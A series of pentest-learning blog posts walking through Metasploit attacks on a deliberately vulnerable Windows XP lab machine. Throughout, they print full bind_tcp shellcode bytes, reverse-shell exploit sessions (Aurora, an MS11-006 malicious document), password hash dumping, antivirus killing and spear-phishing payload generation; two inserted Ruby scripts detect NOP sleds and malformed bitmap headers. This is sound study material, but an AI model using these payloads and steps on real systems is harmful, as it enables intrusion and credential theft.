Channel: Pax Pentest » Metasploit

Metasploit Meterpreter: Migrate a process and obtain system password hashes


This follows on from a previous post in which a target machine was exploited and a Meterpreter shell obtained. Details of the exploited machine are:

Windows XP Pro Service Pack 2 (unpatched). Firewall and software updates switched off, Microsoft Internet Information Services (IIS) (server) and FTP service enabled, SQL Server 2005 Express configured, and a vulnerable web app up and running.

I attempted to obtain the password hashes from the exploited system:

meterpreter > run hashdump
[*] Obtaining the boot key…
[*] Calculating the hboot key using SYSKEY ec2d41aa4579441e29ff2f7c166c0a22…
[*] Obtaining the user list and keys…
[-] Meterpreter Exception: Rex::Post::Meterpreter::RequestError stdapi_registry_query_value: Operation failed: The handle is invalid.
[-] This script requires the use of a SYSTEM user context (hint: migrate into service process)

But this failed, and the error hinted that I should migrate into a service process, which I did:

meterpreter > run post/windows/manage/migrate

[*] Running module against LAB
[*] Current server process: ALqkE.exe (3740)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 3672
[+] Successfully migrated to process 3672

After which run hashdump worked perfectly.

I have blogged on obtaining the password hashes previously.


Metasploit Meterpreter: Killing Antivirus Software on Exploited System – Killav


This follows on from a previous post in which a target machine was exploited and a Meterpreter shell obtained. Details of the exploited machine are:

Windows XP Pro Service Pack 2 (unpatched). Firewall and software updates switched off, Microsoft Internet Information Services (IIS) (server) and FTP service enabled, SQL Server 2005 Express configured, and a vulnerable web app up and running.

The following disables most antivirus programs:

meterpreter > run killav
[*] Killing Antivirus services on the target…
meterpreter >

Simple as that.

Metasploit: Listing Meterpreter Post Exploitation Modules


This follows on from a previous post in which a target machine was exploited and a Meterpreter shell obtained. Details of the exploited machine are:

Windows XP Pro Service Pack 2 (unpatched). Firewall and software updates switched off, Microsoft Internet Information Services (IIS) (server) and FTP service enabled, SQL Server 2005 Express configured, and a vulnerable web app up and running.

A great way to view the Meterpreter post-exploitation modules is to type “run post/” followed by the Tab key:

meterpreter > run post/
Display all 144 possibilities? (y or n)
run post/multi/gather/apple_ios_backup
run post/multi/gather/dns_bruteforce
run post/multi/gather/dns_reverse_lookup
run post/multi/gather/dns_srv_lookup
run post/multi/gather/enum_vbox
run post/multi/gather/env
run post/multi/gather/filezilla_client_cred
run post/multi/gather/find_vmx
run post/multi/gather/firefox_creds
run post/multi/gather/multi_command
run post/multi/gather/pgpass_creds
run post/multi/gather/pidgin_cred
run post/multi/gather/ping_sweep
run post/multi/gather/run_console_rc_file
run post/multi/gather/skype_enum
run post/multi/gather/thunderbird_creds
run post/multi/general/close
run post/multi/general/execute
run post/multi/manage/multi_post
run post/multi/manage/record_mic
run post/windows/capture/keylog_recorder
run post/windows/capture/lockout_keylogger
run post/windows/escalate/bypassuac
–More–

Metasploit Meterpreter Railgun: Post Exploit Windows API Manipulation


Metasploit: The Penetration Tester’s Guide has this to say about Railgun:

You can interface with the Windows native API directly through a Metasploit add-on called Railgun.

[....]

Railgun gives you the same capabilities as a native Win32 application with full access to the Windows API.

Here’s Wikipedia on the Native API:

The Native API (with capitalized N) is the mostly undocumented application programming interface (API) used internally by the Windows NT family of operating systems produced by Microsoft.[1] It is predominately used during system boot, when other components of Windows are unavailable, and by routines such as those in kernel32.dll that implement the Windows API. The program entry point is called DriverEntry(), the same as for a Windows device driver. However, the application runs in ring 3 the same as a regular Windows application. Most of the Native API calls are implemented in ntoskrnl.exe and are exposed to user mode by ntdll.dll. Some Native API calls are implemented in user mode directly within ntdll.dll.

While most of Microsoft Windows is implemented using the documented and well-defined Windows API, a few components, such as the Client/Server Runtime Subsystem, are implemented using the Native API, as they can be started earlier in the Windows NT Startup Process when the Windows API is not yet available.

Some malware make use of the Native API to hide their presence from malware detection software.

Railgun is driven from the Interactive Ruby Shell (irb) inside Meterpreter, which is handy as I’m learning Ruby. I followed the instructions in the above book to create a pop-up on the exploited Windows machine by calling the MessageBoxA function in user32.dll.

Details of the exploited machine are:

Windows XP Pro Service Pack 2 (unpatched). Firewall and software updates switched off, Microsoft Internet Information Services (IIS) (server) and FTP service enabled, SQL Server 2005 Express configured, and a vulnerable web app up and running.

And in the terminal:

meterpreter > irb
[*] Starting IRB shell
[*] The 'client' variable holds the meterpreter client

>> client.railgun.user32.MessageBoxA(0,"hello","world","MB_OK")

I took a screenshot from Meterpreter:

[Screenshot: railgun]

And you can see the pop-up box on the exploited machine. The above book describes the power and implications of Railgun as huge, but then covers no further details and suggests reading the Framework tutorial. I think this is something I will have to return to once I’ve learned the basics of Metasploit.

In the meantime, this video was informative:

Metasploit: Experimenting with Immunity Debugger, NOP’s, Opcode, Assembly Instructions and Shellcode


I’m following the instructions given in Metasploit: The Penetration Tester’s Guide - Chapter 8 (Exploitation Using Client-Side Attacks).

It’s worth watching this excellent video which demonstrates the process I describe below:

First I downloaded Immunity Debugger onto the Windows machine in my Virtual Hacking Lab.

Next I created the shellcode in Metasploit (I used port 446 as I initially struggled with port 443):

~# msfpayload windows/shell/bind_tcp LPORT=446 C
/*
* windows/shell/bind_tcp - 298 bytes (stage 1)
* http://www.metasploit.com
* VERBOSE=false, LPORT=446, RHOST=, EnableStageEncoding=false,
* PrependMigrate=false, EXITFUNC=process,
* InitialAutoRunScript=, AutoRunScript=
*/
unsigned char buf[] =
"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30"
"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
"\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2"
"\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85"
"\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3"
"\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d"
"\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58"
"\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b"
"\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff"
"\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x68\x33\x32\x00\x00\x68"
"\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01"
"\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50\x50"
"\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x97\x31"
"\xdb\x53\x68\x02\x00\x01\xbe\x89\xe6\x6a\x10\x56\x57\x68\xc2"
"\xdb\x37\x67\xff\xd5\x53\x57\x68\xb7\xe9\x38\xff\xff\xd5\x53"
"\x53\x57\x68\x74\xec\x3b\xe1\xff\xd5\x57\x97\x68\x75\x6e\x4d"
"\x61\xff\xd5\x6a\x00\x6a\x04\x56\x57\x68\x02\xd9\xc8\x5f\xff"
"\xd5\x8b\x36\x6a\x40\x68\x00\x10\x00\x00\x56\x6a\x00\x68\x58"
"\xa4\x53\xe5\xff\xd5\x93\x53\x6a\x00\x56\x53\x57\x68\x02\xd9"
"\xc8\x5f\xff\xd5\x01\xc3\x29\xc6\x85\xf6\x75\xec\xc3";

/*
* windows/shell/bind_tcp - 240 bytes (stage 2)
* http://www.metasploit.com
*/
unsigned char buf[] =
"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30"
"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
"\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2"
"\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85"
"\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3"
"\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d"
"\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58"
"\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b"
"\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff"
"\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x68\x63\x6d\x64\x00\x89"
"\xe3\x57\x57\x57\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7\x44"
"\x24\x3c\x01\x01\x8d\x44\x24\x10\xc6\x00\x44\x54\x50\x56\x56"
"\x56\x46\x56\x4e\x56\x56\x53\x56\x68\x79\xcc\x3f\x86\xff\xd5"
"\x89\xe0\x4e\x56\x46\xff\x30\x68\x08\x87\x1d\x60\xff\xd5\xbb"
"\xf0\xb5\xa2\x56\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a"
"\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5";

I’m only interested in the “stage 1” code, to which I add a few \x90 bytes at the beginning (0x90 is the NOP, or no-operation, instruction in Intel x86 assembly). I then remove the quotes and all the \x prefixes and am left with:

909090909090909090909090909090
909090909090909090909090909090
909090909090909090909090909090
fce8890000006089e531d2648b5230
8b520c8b52148b72280fb74a2631ff
31c0ac3c617c022c20c1cf0d01c7e2
f052578b52108b423c01d08b407885
c0744a01d0508b48188b582001d3e3
3c498b348b01d631ff31c0acc1cf0d
01c738e075f4037df83b7d2475e258
8b582401d3668b0c4b8b581c01d38b
048b01d0894424245b5b61595a51ff
e0585f5a8b12eb865d683332000068
7773325f54684c772607ffd5b89001
000029c454506829806b00ffd55050
50504050405068ea0fdfe0ffd59731
db5368020001be89e66a10565768c2
db3767ffd5535768b7e938ffffd553
53576874ec3be1ffd5579768756e4d
61ffd56a006a0456576802d9c85fff
d58b366a406800100000566a006858
a453e5ffd593536a005653576802d9
c85fffd501c329c685f675ecc3
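As an added example (not code from the post), the following Ruby script does the conversion above programmatically: it parses the C-style msfpayload output into bytes, checks the array against the byte count in the header comment, and applies the heuristic that network IDS signatures have long used to spot a NOP sled, a long run of 0x90 bytes. The sample input is a constructed excerpt (a 15-byte sled plus the first two rows of the stage-1 bytes), not the full payload.

```ruby
# Added example (not code from the post). Parses the C-style msfpayload
# output the way the post does by hand, checks the array against the byte
# count in the header comment, and flags NOP sleds (runs of 0x90), the
# heuristic network IDS signatures have long used to spot a sled in front
# of shellcode.

# Constructed sample: a 15-byte NOP sled prepended, as in the post, to the
# first two rows of the stage-1 bytes shown above. The "30 bytes" in the
# header describes only those two rows, because msfpayload wrote its header
# before anything was prepended by hand.
SAMPLE_C_OUTPUT = <<~'EOS'
  /*
  * windows/shell/bind_tcp - 30 bytes (stage 1)
  * http://www.metasploit.com
  */
  unsigned char buf[] =
  "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  "\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30"
  "\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff";
EOS

# Byte count promised by the msfpayload header comment, or nil if absent.
def declared_length(text)
  m = text.match(/(\d+) bytes \(stage \d\)/)
  m && m[1].to_i
end

# Every \xHH escape inside the string literals, returned as a binary String.
def parse_c_array(text)
  text.scan(/\\x([0-9a-fA-F]{2})/).flatten.map { |h| h.to_i(16) }.pack('C*')
end

# The post's manual step: drop the quotes and \x prefixes to get bare hex.
def to_bare_hex(text)
  parse_c_array(text).unpack('H*').first
end

# True when the header's byte count matches what the array actually holds;
# a mismatch means something was added or removed after generation.
def length_matches?(text)
  declared_length(text) == parse_c_array(text).bytesize
end

# NOP-sled heuristic: every run of 0x90 at least min_run bytes long,
# reported as [offset, length]. Short runs are ignored because a lone
# 0x90 can occur legitimately inside ordinary code.
def nop_sled_runs(bytes, min_run = 8)
  runs = []
  start = nil
  bytes.each_byte.with_index do |b, i|
    if b == 0x90
      start ||= i
    elsif start
      runs << [start, i - start] if i - start >= min_run
      start = nil
    end
  end
  # A sled that runs to the very end of the buffer still has to be reported.
  tail = bytes.bytesize - start.to_i
  runs << [start, tail] if start && tail >= min_run
  runs
end

if __FILE__ == $PROGRAM_NAME
  bytes = parse_c_array(SAMPLE_C_OUTPUT)
  puts "declared #{declared_length(SAMPLE_C_OUTPUT)} bytes, parsed #{bytes.bytesize}"
  puts "bare hex: #{to_bare_hex(SAMPLE_C_OUTPUT)}"
  puts "NOP sleds (offset, length): #{nop_sled_runs(bytes).inspect}"
end
```

The length mismatch (45 parsed against 30 declared) is exactly the sled that was prepended by hand, and the sled detector reports it at offset 0.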

I then open Immunity Debugger (ID) on the target machine and open iexplore.exe in it.

In the main ID screen I paste in the above bytes and set breakpoints at the start and end of my code.

I then ran the handler in Metasploit on the attacking machine to see if I could connect to the bind shell on port 446:

msf > use multi/handler
msf exploit(handler) > set payload windows/shell/bind_tcp
payload => windows/shell/bind_tcp
msf exploit(handler) > set LPORT 446
LPORT => 446
msf exploit(handler) > set RHOST 192.168.1.79
RHOST => 192.168.1.79
msf exploit(handler) > exploit

[*] Started bind handler
[*] Starting the payload handler…
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 192.168.1.79
[*] Command shell session 1 opened (192.168.1.70:39979 -> 192.168.1.79:446) at 2013-07-10 10:14:46 +0100

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Program Files\Internet Explorer>

And as you can see the connection was duly established.

Metasploit Meterpreter: Internet Explorer “Aurora” Memory Corruption Client-Side Exploit


I’m following the instructions given in Metasploit: The Penetration Tester’s Guide - Chapter 8 (Exploitation Using Client-Side Attacks).

Details of the target machine on my Virtual Hacking Lab:

Windows XP Pro Service Pack 2 (unpatched). Firewall and software updates switched off, Microsoft Internet Information Services (IIS) (server) and FTP service enabled, SQL Server 2005 Express configured, and a vulnerable web app up and running.

Metasploit describes this exploit thus:

This module exploits a memory corruption flaw in Internet Explorer. This flaw was found in the wild and was a key component of the “Operation Aurora” attacks that lead to the compromise of a number of high profile companies. The exploit code is a direct port of the public sample published to the Wepawet malware analysis site. The technique used by this module is currently identical to the public sample, as such, only Internet Explorer 6 can be reliably exploited.

This is my first client-side exploit and I must say I rather enjoyed it.

Firstly to Metasploit to set up the exploit:

msf > use windows/browser/ms10_002_aurora
msf exploit(ms10_002_aurora) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms10_002_aurora) > set SRVPORT 80
SRVPORT => 80
msf exploit(ms10_002_aurora) > set URIPATH /
URIPATH => /
msf exploit(ms10_002_aurora) > set LHOST 192.168.1.70 <– This is my IP (The attacking machine)
LHOST => 192.168.1.70
msf exploit(ms10_002_aurora) > set LPORT 443
LPORT => 443
msf exploit(ms10_002_aurora) > exploit -z
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.1.70:443
[*] Using URL: http://0.0.0.0:80/

[*] Local IP: http://192.168.1.70:80/
[*] Server started.

Then I opened Internet Explorer on the target Windows system and entered the IP of the attacking machine in the browser.

At the same time I opened the Task Manager and watched the memory usage for iexplore.exe jump from around 3,000-5,000K to over 300,000K as the exploit filled the heap.

Back to the attacking machine and Metasploit:

msf exploit(ms10_002_aurora) > [*] 192.168.1.79 ms10_002_aurora – Sending Internet Explorer “Aurora” Memory Corruption
[*] Sending stage (751104 bytes) to 192.168.1.79
[*] Meterpreter session 1 opened (192.168.1.70:443 -> 192.168.1.79:1115) at 2013-07-19 14:53:29 +0100

msf exploit(ms10_002_aurora) >

I then wanted a Meterpreter shell:

msf exploit(ms10_002_aurora) > sessions -i 1
[*] Starting interaction with 1…

meterpreter >

I took a screenshot of the victim machine:

meterpreter > screenshot

[Screenshot: aurora]

I then wanted to escalate my privileges:

meterpreter > getsystem
…got system (via technique 1).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >

I thought I’d best migrate to another process in case Internet Explorer was closed, which would have killed the session:

meterpreter > run post/windows/manage/migrate

[*] Running module against LAB
[*] Current server process: IEXPLORE.EXE (3156)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 2720
[+] Successfully migrated to process 2720
meterpreter >

Job done and good fun.

Metasploit Meterpreter: MS11-006 Client-Side Malicious Document Exploit – Microsoft Windows CreateSizedDIBSECTION Stack Buffer Overflow


I’m following the instructions given in Metasploit: The Penetration Tester’s Guide - Chapter 8 (Exploitation Using Client-Side Attacks).

Details of the target machine on my Virtual Hacking Lab:

Windows XP Pro Service Pack 2 (unpatched). Firewall and software updates switched off, Microsoft Internet Information Services (IIS) (server) and FTP service enabled, SQL Server 2005 Express configured, and a vulnerable web app up and running.

Metasploit describes this exploit thus:

This module exploits a stack-based buffer overflow in the handling of thumbnails within .MIC files and various Office documents. When processing a thumbnail bitmap containing a negative ‘biClrUsed’ value, a stack-based buffer overflow occurs. This leads to arbitrary code execution. In order to trigger the vulnerable code, the folder containing the document must be viewed using the “Thumbnails” view.
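Added example (not from the post or the Metasploit module): a small Ruby check for the condition the description names, a DIB thumbnail header whose biClrUsed field is negative when read as a signed 32-bit integer. It assumes the 40-byte BITMAPINFOHEADER has already been carved out of the document (locating it inside a .doc or .MIC container is not covered), and the two sample headers are constructed.

```ruby
# Added example (not from the post or the Metasploit module). Parses a
# BITMAPINFOHEADER the way a thumbnail scanner would and flags the pattern
# the module description names: a biClrUsed value that is negative when
# read as a signed 32-bit integer. Assumes the 40-byte header has already
# been carved out of the document.

BITMAPINFOHEADER_SIZE = 40
FIELDS = %i[biSize biWidth biHeight biPlanes biBitCount biCompression
            biSizeImage biXPelsPerMeter biYPelsPerMeter biClrUsed biClrImportant].freeze
# Little-endian layout: three 32-bit values, two 16-bit values, six 32-bit values.
# biClrUsed is unpacked as signed ('l<') to mirror the signed comparison that
# lets a negative count slip past a "too many colours" check.
PACK_FORMAT = 'L<l<l<S<S<L<L<l<l<l<L<'

# Returns a Hash of field name => value.
def parse_dib_header(bytes)
  raise ArgumentError, 'header too short' if bytes.bytesize < BITMAPINFOHEADER_SIZE
  FIELDS.zip(bytes.byteslice(0, BITMAPINFOHEADER_SIZE).unpack(PACK_FORMAT)).to_h
end

# Returns an Array of findings; empty when the header looks sane.
def check_thumbnail_header(bytes)
  h = parse_dib_header(bytes)
  findings = []
  if h[:biSize] != BITMAPINFOHEADER_SIZE
    findings << "biSize is #{h[:biSize]}, expected #{BITMAPINFOHEADER_SIZE}"
  end
  if h[:biClrUsed] < 0
    findings << "biClrUsed is negative (#{h[:biClrUsed]}): MS11-006 trigger pattern"
  end
  # An indexed bitmap can never have more than 2**bitcount palette entries.
  if h[:biBitCount].between?(1, 8) && h[:biClrUsed] > (1 << h[:biBitCount])
    findings << "biClrUsed #{h[:biClrUsed]} exceeds the #{1 << h[:biBitCount]}-entry " \
                "palette for #{h[:biBitCount]} bpp"
  end
  findings
end

# Builds a header for the constructed samples below (planes = 1, no compression).
def build_dib_header(width:, height:, bit_count:, clr_used:)
  [BITMAPINFOHEADER_SIZE, width, height, 1, bit_count, 0, 0, 0, 0, clr_used, 0].pack(PACK_FORMAT)
end

# Constructed samples: a normal 8-bit thumbnail with a full 256-entry palette,
# and one whose biClrUsed is -1 (0xFFFFFFFF when read unsigned).
BENIGN_THUMBNAIL  = build_dib_header(width: 96, height: 96, bit_count: 8, clr_used: 256)
HOSTILE_THUMBNAIL = build_dib_header(width: 96, height: 96, bit_count: 8, clr_used: -1)

if __FILE__ == $PROGRAM_NAME
  { 'benign' => BENIGN_THUMBNAIL, 'hostile' => HOSTILE_THUMBNAIL }.each do |name, hdr|
    puts "#{name}: #{check_thumbnail_header(hdr).inspect}"
  end
end
```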

The first step is to create the malicious document within Metasploit:

msf > use windows/fileformat/ms11_006_createsizeddibsection
msf exploit(ms11_006_createsizeddibsection) > set outputpath /root/ <– I changed the output directory as the original one didn’t exist.
outputpath => /root/
msf exploit(ms11_006_createsizeddibsection) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms11_006_createsizeddibsection) > set LHOST 192.168.1.70 <– Attacking machine.
LHOST => 192.168.1.70
msf exploit(ms11_006_createsizeddibsection) > set LPORT 447 <– Attacking machine port.
LPORT => 447
msf exploit(ms11_006_createsizeddibsection) > exploit

[*] Creating ‘msf.doc’ file …
[*] Generated output file /root/msf.doc <– File created.

I then emailed the created “malicious” file as an attachment, to be opened on the target Windows machine. I was very impressed with Google Gmail as it rejected the email and noted:

Our system detected an illegal attachment on your message

So, I had to send the file via another web based mail system.

Before opening the file on the target Windows system, I needed to set up the attacking machine to listen for incoming connections from the target machine:

msf exploit(ms11_006_createsizeddibsection) > use multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.70
LHOST => 192.168.1.70
msf exploit(handler) > set LPORT 447
LPORT => 447
msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.1.70:447
[*] Starting the payload handler…

I then opened the malicious file on the target machine and viewed as a thumbnail in the hope it would trigger the exploit; however, nothing happened, and the hack failed.

Microsoft lists the Windows versions affected by this vulnerability and my 32-bit XP Pro SP2 is not among them, so perhaps this is the reason the exploit failed. The above book states the Windows system should be SP3, which mine is not.

A little disappointed.

Anyway, here’s a nice step-by-step guide to this exploit.

And this video, may or may not be useful:

Metasploit: My first use of Auxiliary Modules


Chapter nine of Metasploit: The Penetration Tester’s Guide moves into auxiliary modules. Here’s a snippet from the book:

In addition to providing valuable tools such as port scanners and service fingerprints, auxiliary modules such as ssh_login can take a known list of usernames and passwords and then attempt to log in via brute force across an entire network. Also included in the auxiliary modules are various protocol fuzzers such as ftp_pre_post, http_get_uri, smtp_fuzzer, ssh_version_corrupt and more. You can launch these fuzzers at a target service in hopes of finding your own vulnerabilities to exploit.

We can list all the auxiliary modules available:

msf > show auxiliary

Auxiliary
=========

Name                                         Disclosure Date  Rank    Description
----                                         ---------------  ----    -----------
admin/2wire/xslt_password_reset              2007-08-15       normal  2Wire Cross-Site Request Forgery Password Reset Vulnerability
admin/backupexec/dump                                         normal  Veritas Backup Exec Windows Remote File Access
admin/backupexec/registry                                     normal  Veritas Backup Exec Server Registry Access
admin/cisco/cisco_secure_acs_bypass                           normal  Cisco Secure ACS Version < 5.1.0.44.5 or 5.2.0.26.2 Unauthorized Password Change
admin/cisco/vpn_3000_ftp_bypass              2006-08-23       normal  Cisco VPN Concentrator 3000 FTP Unauthorized Administrative Access
admin/db2/db2rcmd                            2004-03-04       normal  IBM DB2 db2rcmd.exe Command Execution Vulnerability
admin/edirectory/edirectory_dhost_cookie                      normal  Novell eDirectory DHOST Predictable Session Cookie
admin/edirectory/edirectory_edirutil                          normal  Novell eDirectory eMBox Unauthenticated File Access
admin/emc/alphastor_devicemanager_exec       2008-05-27       normal  EMC AlphaStor Device Manager Arbitrary Command Execution
admin/emc/alphastor_librarymanager_exec      2008-05-27       normal  EMC AlphaStor Library Manager Arbitrary Command Execution
admin/hp/hp_data_protector_cmd               2011-02-07       normal  HP Data Protector 6.1 EXEC_CMD Command Execution
admin/http/axigen_file_access                2012-10-31       normal  Axigen Arbitrary File Read and Delete
admin/http/contentkeeper_fileaccess                           normal  ContentKeeper Web Appliance mimencode File Access
admin/http/dlink_dir_300_600_exec_noauth     2013-02-04       normal  D-Link DIR-600 / DIR-300 Unauthenticated Remote Command Execution
admin/http/dlink_dir_645_password_extractor                   normal  DLink DIR 645 Password Extractor
admin/http/dlink_dsl320b_password_extractor                   normal  DLink DSL 320B Password Extractor
admin/http/hp_web_jetadmin_exec              2004-04-27       normal  HP Web JetAdmin 6.5 Server Arbitrary Command Execution
admin/http/iis_auth_bypass                   2010-07-02       normal  MS10-065 Microsoft IIS 5 NTFS Stream Authentication Bypass
admin/http/intersil_pass_reset

And so on…..

Here’s my first use of an auxiliary module against my virtual hacking lab:

msf > use scanner/http/webdav_scanner
msf auxiliary(webdav_scanner) > info

Name: HTTP WebDAV Scanner
Module: auxiliary/scanner/http/webdav_scanner
Version: 0
License: Metasploit Framework License (BSD)
Rank: Normal

Provided by:
et <et@metasploit.com>

Basic options:
Name     Current Setting  Required  Description
----     ---------------  --------  -----------
PATH     /                yes       Path to use
Proxies                   no        Use a proxy chain
RHOSTS                    yes       The target address range or CIDR identifier
RPORT    80               yes       The target port
THREADS  1                yes       The number of concurrent threads
VHOST                     no        HTTP server virtual host

Description:
Detect webservers with WebDAV enabled

msf auxiliary(webdav_scanner) > set RHOSTS 192.168.1.79
RHOSTS => 192.168.1.79
msf auxiliary(webdav_scanner) > run

[+] 192.168.1.79 (Microsoft-IIS/5.1) has WEBDAV ENABLED
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(webdav_scanner) >

This auxiliary module simply detects webservers with WebDAV enabled, which it is in this instance.


Kali Linux: The Social-Engineer Toolkit (SET)


Chapter ten of Metasploit: The Penetration Tester’s Guide moves into social engineering, which is a topic I’ve yet to explore. It transpires that one of the authors of the above book – David “SacMan” Kennedy – developed the Social-Engineer Toolkit (SET) to coincide with the release of Social-Engineer.org.

The site offers a centralised location for social-engineering tutorials and explains terminologies, definitions, and scenarios that can help you prepare for hacking the human mind.

I like the website’s reference to exploiting the “HumanOS”.

Here’s a snippet from the above book relating to SET:

The purpose of SET is to fill a gap in the penetration testing community and bring awareness to social-engineering attacks. And it has succeeded – SET has been downloaded 1 million times and is now an industry standard for deploying social-engineering attacks. The toolkit attacks human weakness, exploiting curiosity, credibility, avarice, and simple human stupidity. Social-engineering attacks are at an all-time high and have always been a large risk for many organisations.

Backtrack and Kali Linux come with SET as default. In Kali you can find SET in “Exploitation Tools”.

The Social-Engineer Toolkit (SET) and Metasploit: Spear-Phishing Attack Vectors


This post follows the instructions given in chapter ten (The Social-Engineer Toolkit) of Metasploit: The Penetration Tester’s Guide. Previous post here.

Here’s what we’re greeted with in the terminal on starting The Social-Engineer Toolkit (SET):

Select from the menu:

1) Social-Engineering Attacks
2) Fast-Track Penetration Testing
3) Third Party Modules
4) Update the Metasploit Framework
5) Update the Social-Engineer Toolkit
6) Update SET configuration
7) Help, Credits, and About

99) Exit the Social-Engineer Toolkit

We’ll select option one and are shown the following:

Select from the menu:

1) Spear-Phishing Attack Vectors
2) Website Attack Vectors
3) Infectious Media Generator
4) Create a Payload and Listener
5) Mass Mailer Attack
6) Arduino-Based Attack Vector
7) SMS Spoofing Attack Vector
8) Wireless Access Point Attack Vector
9) QRCode Generator Attack Vector
10) Powershell Attack Vectors
11) Third Party Modules

99) Return back to the main menu.

And select one again.

The Spearphishing module allows you to specially craft email messages and send
them to a large (or small) number of people with attached fileformat malicious
payloads. If you want to spoof your email address, be sure "Sendmail" is
installed (apt-get install sendmail) and change the config/set_config SENDMAIL=OFF
flag to SENDMAIL=ON.

There are two options, one is getting your feet wet and letting SET do
everything for you (option 1), the second is to create your own FileFormat
payload and use it in your own attack. Either way, good luck and enjoy!

1) Perform a Mass Email Attack
2) Create a FileFormat Payload
3) Create a Social-Engineering Template

99) Return to Main Menu

We’ll select one again:

Select the file format exploit you want.
The default is the PDF embedded EXE.

********** PAYLOADS **********

1) SET Custom Written DLL Hijacking Attack Vector (RAR, ZIP)
2) SET Custom Written Document UNC LM SMB Capture Attack
3) Microsoft Windows CreateSizedDIBSECTION Stack Buffer Overflow
4) Microsoft Word RTF pFragments Stack Buffer Overflow (MS10-087)
5) Adobe Flash Player “Button” Remote Code Execution
6) Adobe CoolType SING Table “uniqueName” Overflow
7) Adobe Flash Player “newfunction” Invalid Pointer Use
8) Adobe Collab.collectEmailInfo Buffer Overflow
9) Adobe Collab.getIcon Buffer Overflow
10) Adobe JBIG2Decode Memory Corruption Exploit
11) Adobe PDF Embedded EXE Social Engineering
12) Adobe util.printf() Buffer Overflow
13) Custom EXE to VBA (sent via RAR) (RAR required)
14) Adobe U3D CLODProgressiveMeshDeclaration Array Overrun
15) Adobe PDF Embedded EXE Social Engineering (NOJS)
16) Foxit PDF Reader v4.1.1 Title Stack Buffer Overflow
17) Apple QuickTime PICT PnSize Buffer Overflow
18) Nuance PDF Reader v6.0 Launch Stack Buffer Overflow
19) Adobe Reader u3D Memory Corruption Vulnerability
20) MSCOMCTL ActiveX Buffer Overflow (ms12-027)

We’ll select eight, which is a heap-based exploit, and are then asked for a payload:

1) Windows Reverse TCP Shell Spawn a command shell on victim and send back to attacker
2) Windows Meterpreter Reverse_TCP Spawn a meterpreter shell on victim and send back to attacker
3) Windows Reverse VNC DLL Spawn a VNC server on victim and send back to attacker
4) Windows Reverse TCP Shell (x64) Windows X64 Command Shell, Reverse TCP Inline
5) Windows Meterpreter Reverse_TCP (X64) Connect back to the attacker (Windows x64), Meterpreter
6) Windows Shell Bind_TCP (X64) Execute payload and create an accepting port on remote system
7) Windows Meterpreter Reverse HTTPS Tunnel communication over HTTP using SSL and use Meterpreter

And now number two:

set:payloads>2
set> IP address for the payload listener: 192.168.1.70 <– Enter attacking IP address
set:payloads> Port to connect back on [443]: <– Enter attacking listening port
[-] Defaulting to port 443…
[-] Generating fileformat exploit…
[*] Payload creation complete.
[*] All payloads get sent to the /root/.set/template.pdf directory
[-] As an added bonus, use the file-format creator in SET to create your attachment.

Right now the attachment will be imported with filename of ‘template.whatever’

Do you want to rename the file?

example Enter the new filename: moo.pdf

1. Keep the filename, I don’t care.
2. Rename the file, I want to be cool.

We’ll keep the default filename by entering one.

